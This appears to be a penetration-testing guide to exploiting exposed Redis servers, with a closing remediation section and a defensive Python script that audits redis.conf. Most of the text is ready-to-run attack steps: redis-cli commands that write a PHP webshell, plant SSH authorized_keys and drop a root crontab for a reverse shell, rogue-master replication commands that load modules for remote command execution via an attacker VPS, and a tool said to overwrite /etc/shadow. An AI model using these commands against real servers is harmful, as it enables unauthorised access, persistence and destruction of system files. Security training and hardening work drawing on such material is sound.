
Title: Common ways to use Redis in penetration testing


Common ways to exploit Redis in penetration testing

This article assumes one of two starting points: the Redis instance accepts unauthenticated connections, or its password is already known.


1 Writing a webshell

Conditions:

The absolute path of the web directory is known

The Redis process has write permission to that directory

List the existing keys, then create a new key whose value is the webshell; the demonstration here writes a phpinfo() call.

Setting a key that already exists overwrites its original value, so list all keys first and choose a name that is not in use. Note that redis-cli only interprets escapes such as \n inside double quotes; a single-quoted string is stored literally. The leading and trailing newlines isolate the PHP tag from the binary RDB data that surrounds it in the saved file.

keys *                                   # list existing keys, pick an unused name

set x "\n\n<?php phpinfo(); ?>\n\n"      # the value is the webshell

get x                                    # confirm what was stored


Check the Redis configuration. Writing the webshell changes dir and dbfilename, so record their original values now; that makes it easy to restore them once the file has been written.

config get *


Set the output directory and file name for the webshell, then write it out with SAVE.

config set dir /var/www          # directory the file is written to

config set dbfilename 1.php      # file name

save                             # write the file


Finally, restore the original dir and dbfilename values recorded earlier; otherwise the next background save will overwrite the webshell and the server's real dump will end up in the web root.

2 Writing an SSH public key

Conditions:

The user the Redis service runs as is known

That user's home directory contains a .ssh directory

The SSH server allows public-key authentication

2.1 Generate a key pair

ssh-keygen -t rsa    # generate the public/private key pair

2.2 Write the file with redis config

set x "\n\n<public key content>\n\n"

config set dir /home/user/.ssh

config set dbfilename authorized_keys

save

SAVE replaces the file rather than appending to it, so any authorized_keys that already existed for that user is lost; restore dir and dbfilename afterwards as in section 1.

2.3 Log in with the key pair

ssh -i id_rsa user@ip

3 Writing a cron job for a reverse shell

Conditions:

The Redis process can write to the cron spool directory

The cron daemon is running on the target

keys *                                   # list existing keys

set x "\n\n<cron job content>\n\n"

config get *                             # record the original dir and dbfilename

config set dir /var/spool/cron

config set dbfilename root

save                                     # write the file

del x                                    # remove the key

The /var/spool/cron/root path is the CentOS layout. On Debian and Ubuntu the per-user crontabs live under /var/spool/cron/crontabs/ and that cron refuses files it considers insecurely permissioned, so the trick is far less reliable there.

4 Master-slave replication

4.1 Loading an extension module to execute system commands

The underlying principle was explained in the earlier vulnerability reproduction articles. The technique relies on MODULE LOAD, so the target must be running Redis 4.0 or later.

Script address: https://github.com/Dliv3/redis-rogue-server

Active connection mode:

Parameter description:

--rpasswd  password for the target Redis, if it has authentication enabled

--rhost    target Redis IP

--rport    target Redis port, default 6379

--lhost    the VPS's public IP address

--lport    the port the VPS listens on, default 21000

python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>


Passive connection mode:

Applies when the target Redis sits on an internal network:

Redis is reached through an SSRF

The internal Redis allows unauthenticated access or its password is known, and it has to connect back out to the rogue server

python3 redis-rogue-server.py --server-only

4.2 Writing clean files via master-slave replication

On Linux, SYNC master-slave replication can be used to write a file that contains nothing but the payload, with none of the RDB data that surrounds a key written by SAVE. Script:

https://github.com/r35tart/RedisWriteFile

This script writes byte-exact files through Redis replication; it can write binaries such as EXE, DLL and LNK files on Windows and .so files on Linux.

It can also overwrite /etc/shadow on Linux without any surrounding junk.

python3 RedisWriteFile.py --rhost 172.17.0.2 --rport 6379 --lhost 172.17.0.1 --lport 4444 --rpath '/var/www' --rfile 'test.php' --lfile './phpinfo.php'


The methods above mainly target Linux. When the Windows target is not running a web service, how do you get a shell?

The following are common ways to exploit Redis on Windows:

System DLL hijacking (requires the target to restart or log out)

DLL hijacking of specific software (requires one click from the target)

Overwriting a shortcut on the target (requires one click from the target)

Overwriting the configuration file of specific software for privilege escalation (requires no click, or one click)

Overwriting files such as sethc.exe (triggered by the attacker)

Reference: http://r3start.net/index.php/2020/05/25/717

5 Remediation

Enable password authentication (requirepass)

Run the Redis service as a low-privileged user, so that even a successful file write lands outside web roots, cron spools and .ssh directories

Restrict which IPs may connect (bind to the loopback or internal interface and firewall the port)
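Every attack on this page needs the same few things from the server: reachable without a password, listening where the attacker can get to it, and CONFIG/SLAVEOF/MODULE still callable. The following added example (not from the original article) parses a redis.conf and reports which of those enablers are present, with a constructed permissive configuration next to a hardened one; the sample values, file names and the finding identifiers are assumptions made for the example.

```python
import shlex

# Constructed sample configurations (not from the article): a permissive one beside a hardened one.
WEAK_CONF = """\
# listens everywhere, no password, every management command available
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
dir /var/lib/redis
dbfilename dump.rdb
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""

# Commands that give the file-write, rogue-master and module-load primitives described above.
DANGEROUS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")


def parse_conf(text):
    """redis.conf is one 'directive arg ...' per line; '#' lines are comments; a directive may repeat."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)            # handles the "" used to disable a command
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text):
    """Return identifiers of the weaknesses that enable the attacks above, in a fixed order."""
    conf = parse_conf(text)
    findings = []
    if not any(a and a[0] for a in conf.get("requirepass", [])):
        findings.append("no-auth")                      # anyone who reaches the port has full access
    binds = conf.get("bind", [["0.0.0.0"]])[0]          # no bind directive means every interface
    if any(b.lstrip("-") in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind-all")
    if conf.get("protected-mode", [["yes"]])[0][0].lower() == "no":
        findings.append("protected-mode-off")           # the last guard for a passwordless instance
    handled = {a[0].upper() for a in conf.get("rename-command", []) if len(a) == 2}
    for cmd in DANGEROUS:
        if cmd not in handled:
            findings.append(cmd.lower() + "-exposed")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "no findings")
```

Renaming to a non-empty name only hides a command, so treat anything other than "" as a weaker mitigation than shown here. On Redis 6 and later the ACL system (user directives) can deny CONFIG, SLAVEOF/REPLICAOF and MODULE per user without renaming them, and the point about running as a low-privileged user is not visible in redis.conf at all: check the service unit or process owner for that.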
